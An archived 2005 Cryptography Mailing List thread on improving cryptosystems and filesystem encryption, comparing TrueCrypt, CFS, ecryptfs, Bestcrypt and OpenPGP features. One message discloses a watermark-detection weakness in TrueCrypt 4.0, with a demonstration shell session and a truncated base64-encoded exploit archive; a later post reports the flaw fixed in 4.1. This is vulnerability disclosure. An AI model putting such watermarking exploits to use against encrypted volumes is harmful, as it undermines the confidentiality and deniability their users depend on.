Re: gonzo cryptography; how would you improve existing cryptosystems?

2005-12-07 Thread Alexander Klimov
On Thu, 17 Nov 2005, Jari Ruusu wrote:

 Unfortunately truecrypt is just another broken device crypto implementation
 that uses good ciphers in insecure way. Specially crafted static bit
 patterns are easily detectable through that kind of bad crypto.

Looks like they have fixed it: version 4.1 (2005-11-25) supports
tweakable narrow-block encryption (LRW).

-- 
Regards,
ASK

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: gonzo cryptography; how would you improve existing cryptosystems?

2005-11-17 Thread Jari Ruusu
Thomas Sjögren wrote:
 On Tue, Nov 08, 2005 at 05:58:04AM -0600, Travis H. wrote:
  The only thing close that I've seen is Bestcrypt, which is commercial
  and has a Linux and Windows port.  I don't recall if the Linux port
  came with source or not.
 
 http://www.truecrypt.org/
 
 TrueCrypt
 Free open-source disk encryption software for Windows XP/2000/2003 and Linux

Unfortunately truecrypt is just another broken device crypto implementation
that uses good ciphers in insecure way. Specially crafted static bit
patterns are easily detectable through that kind of bad crypto.
Requirements: (1) used ciphers must have 128-bit block size and (2) file
system where bit patterns are stored must have 2K or larger soft block size.
Many popular linux file systems meet those requirements. Uuencoded exploit
source code is included in this email.

# truecrypt --device-number 0 --filesystem ext2 /tmp/container1.tc /mnt
Enter password for '/tmp/container1.tc':
# mount | grep /mnt
/dev/mapper/truecrypt0 on /mnt type ext2 (rw)
# tune2fs -l /dev/mapper/truecrypt0 | grep Block size
Block size:   4096
# ./create-watermark-encodings-truecrypt 10:44 11:55 12:66 666:77 /mnt/foo1
# truecrypt -d /mnt
# truecrypt -l
truecrypt: Kernel module not loaded
# ./detect-watermark-encodings-truecrypt /tmp/container1.tc
5241344 bytes scanned
watermark encoding 10, count 44
watermark encoding 11, count 55
watermark encoding 12, count 66
watermark encoding 666, count 77
# uname -s -r
Linux 2.6.14.2
# truecrypt --version | head -n 1
truecrypt 4.0

-- 
Jari Ruusu  1024R/3A220F51 5B 4B F9 BB D3 3F 52 E9  DB 1D EB E3 24 0E A9 DD


begin-base64 644 watermark-exploits.tar.bz2
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

Re: gonzo cryptography; how would you improve existing cryptosystems?

2005-11-09 Thread Jon Callas

On 4 Nov 2005, at 5:23 PM, Travis H. wrote:


For example, pgp doesn't hide the key IDs of the addressees.


But OpenPGP does. Here's an extract fro RFC 2440:

5.1. Public-Key Encrypted Session Key Packets (Tag 1)

[...]

   An implementation MAY accept or use a Key ID of zero as a wild  
card

   or speculative Key ID. In this case, the receiving implementation
   would try all available private keys, checking for a valid decrypted
   session key. This format helps reduce traffic analysis of messages.

Now, there has been much discussion about how useful this is, and  
there are other related issues like how you do the UI for such a  
thing. But the *protocol* handles it.


You might also want to look at the PFS extensions for OpenPGP:

http://www.apache-ssl.org/openpgp-pfs.txt

and even OTR, which is very cool in its own right (and is designed to  
take care of the sort of edge conditions all of these other things  
have):


http://www.cypherpunks.ca/otr/

Jon


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: gonzo cryptography; how would you improve existing cryptosystems?

2005-11-08 Thread Jonathan Thornburg

On Fri, 4 Nov 2005, Travis H. wrote:

PS:  There's a paper on cryptanalyzing CFS on my homepage below.  I
got to successfully use classical cryptanalysis on a relatively modern
system!  That is a rare joy.  CFS really needs a re-write, there's no
real good alternatives for cross-platform filesystem encryption to my
knowledge.


On Mon, 7 Nov 2005, Jason Holt wrote:

Take a look at ecryptfs before rewriting cfs:

http://sourceforge.net/projects/ecryptfs


Nice, but linux-only and requires special kernel support.  cfs supports
lots and lots of different OSs and doesn't require kernel modes.  So far
as I know, in this regard cfs is unique among cryptographic filesystems.

ciao,

--
-- Jonathan Thornburg [EMAIL PROTECTED]
   Max-Planck-Institut fuer Gravitationsphysik (Albert-Einstein-Institut),
   Golm, Germany, Old Europe http://www.aei.mpg.de/~jthorn/home.html
   Washing one's hands of the conflict between the powerful and the
powerless means to side with the powerful, not to be neutral.
  -- quote by Freire / poster by Oxfam


-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: gonzo cryptography; how would you improve existing cryptosystems?

2005-11-08 Thread Travis H.
 Nice, but linux-only and requires special kernel support.  cfs supports
 lots and lots of different OSs and doesn't require kernel modes.  So far
 as I know, in this regard cfs is unique among cryptographic filesystems.

The only thing close that I've seen is Bestcrypt, which is commercial
and has a Linux and Windows port.  I don't recall if the Linux port
came with source or not.  I had problems with the init script hanging
the boot process, or at least delaying it significantly, so I
uninstalled it until I could devote the time to analyze what was going
on.  Right after installation I tried using it to read a container
copied from a corrupted Windows machine, but was not successful.  It
is unclear to me if this was due to the corruption which occured, or
some kind of incompatibility between the Windows and Linux ports.
--
http://www.lightconsulting.com/~travis/  --
We already have enough fast, insecure systems. -- Schneier  Ferguson
GPG fingerprint: 50A1 15C5 A9DE 23B9 ED98 C93E 38E9 204A 94C2 641B

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: gonzo cryptography; how would you improve existing cryptosystems?

2005-11-08 Thread Alexander Klimov
On Mon, 7 Nov 2005, Jason Holt wrote:
 Take a look at ecryptfs before rewriting cfs

... or at TrueCrypt (which works on linux and windows):

  http://www.truecrypt.org/downloads.php

-- 
Regards,
ASK

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: gonzo cryptography; how would you improve existing cryptosystems?

2005-11-08 Thread Thomas Sjögren
On Tue, Nov 08, 2005 at 05:58:04AM -0600, Travis H. wrote:
 The only thing close that I've seen is Bestcrypt, which is commercial
 and has a Linux and Windows port.  I don't recall if the Linux port
 came with source or not.

http://www.truecrypt.org/

TrueCrypt
Free open-source disk encryption software for Windows XP/2000/2003 and Linux
Main Features:

* It can create a virtual encrypted disk within a file and mount it as a real 
disk.
* It can encrypt an entire hard disk partition or a device, such as USB memory 
stick, floppy disk, etc.
* Provides two levels of plausible deniability, in case an adversary forces you 
to reveal the password:
  1) Hidden volume (more information may be found here).
  2) No TrueCrypt volume can be identified (TrueCrypt volumes cannot be 
distinguished from random data).
* Encryption algorithms: AES-256, Blowfish (448-bit key), CAST5, Serpent 
(256-bit key), Triple DES, and 
Twofish (256-bit key). Supports cascading (e.g., AES-Twofish-Serpent).
* Based on Encryption for the Masses (E4M) 2.02a, which was conceived in 1997.
Further information regarding the features of the software may be found in the 
documentation.

Complete source code (in C) of the latest stable version of TrueCrypt for all 
supported operating 
systems and all supported hardware platforms are available from 
http://www.truecrypt.org/downloads.php

/Thomas
-- 


signature.asc
Description: Digital signature


gonzo cryptography; how would you improve existing cryptosystems?

2005-11-07 Thread Travis H.
Hi folks,

If one had the ability to create standards over, with reckless
disregard for performance, how would you improve their security?

Feel free to pick a protocol or system (e.g. gpg or isakmp) and let me
know how it is done, and how it should have been done.

For example, pgp doesn't hide the key IDs of the addressees.  Many
systems use hashes that are too small.  DSA keys are too small
compared to large ElG keys.  How would you make a signature with a
larger keyspace?  Does the protocol wrap encryption in authentication
instead of vice-versa?  Does ISAKMP do encryption where the input is
meant to be secret, instead of the key?  Does it use a rinky-dink
algorithm, now that much better ones are available?

I've got a hankering to re-write something, and I want to know what
can be improved the most.

PS:  There's a paper on cryptanalyzing CFS on my homepage below.  I
got to successfully use classical cryptanalysis on a relatively modern
system!  That is a rare joy.  CFS really needs a re-write, there's no
real good alternatives for cross-platform filesystem encryption to my
knowledge.
--
http://www.lightconsulting.com/~travis/  --
We already have enough fast, insecure systems. -- Schneier  Ferguson
GPG fingerprint: 50A1 15C5 A9DE 23B9 ED98 C93E 38E9 204A 94C2 641B

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: gonzo cryptography; how would you improve existing cryptosystems?

2005-11-07 Thread Travis H.
 Does ISAKMP do encryption where the input is
 meant to be secret, instead of the key?

I meant MAC, not encryption, sorry.
Of course encryption inputs are secret.
--
http://www.lightconsulting.com/~travis/  --
We already have enough fast, insecure systems. -- Schneier  Ferguson
GPG fingerprint: 50A1 15C5 A9DE 23B9 ED98 C93E 38E9 204A 94C2 641B

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: gonzo cryptography; how would you improve existing cryptosystems?

2005-11-07 Thread Jason Holt


On Fri, 4 Nov 2005, Travis H. wrote:

PS:  There's a paper on cryptanalyzing CFS on my homepage below.  I
got to successfully use classical cryptanalysis on a relatively modern
system!  That is a rare joy.  CFS really needs a re-write, there's no
real good alternatives for cross-platform filesystem encryption to my
knowledge.


Take a look at ecryptfs before rewriting cfs:

http://sourceforge.net/projects/ecryptfs

-J

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]